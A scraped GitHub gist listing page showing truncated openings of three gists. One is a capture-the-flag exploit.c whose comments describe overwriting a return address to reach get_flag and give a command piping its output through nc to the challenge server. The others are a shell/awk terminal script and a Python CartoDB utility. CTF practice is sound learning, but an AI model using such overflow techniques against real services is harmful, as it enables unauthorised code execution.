Skip to content

Instantly share code, notes, and snippets.

View bryceandress's full-sized avatar

Bryce Andress bryceandress

View GitHub Profile
@charles-l
charles-l / exploit.c
Last active April 14, 2016 05:34
exploit to solve pwn1 in the sctf challenge
#include <stdio.h>
// TO RUN EXPLOIT (this file just generates the junk needed to overflow to the return address):
// cc exploit.c; ./a.out | nc problems2.2016q1.sctf.io 1337
int main() {
// EIP points to the current stack frame (so we want it to point at get_flag)
//
// We can do this by overwriting the old return address with the address for get_flag
// (which you can get by running `pd 1 @ sym.get_flag` in radare)
#!/bin/env sh
lines=$(tput lines)
cols=$(tput cols)
awkscript='
{
letters="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@#$%^&*()"
lines=$1
@andrewxhill
andrewxhill / cartodb-utils.py
Last active June 11, 2021 15:27
command-line python interface for manipulating data on CartoDB
import os
import urllib
import urllib2
import base64
import json
import sys
import argparse
try:
import requests
except ImportError: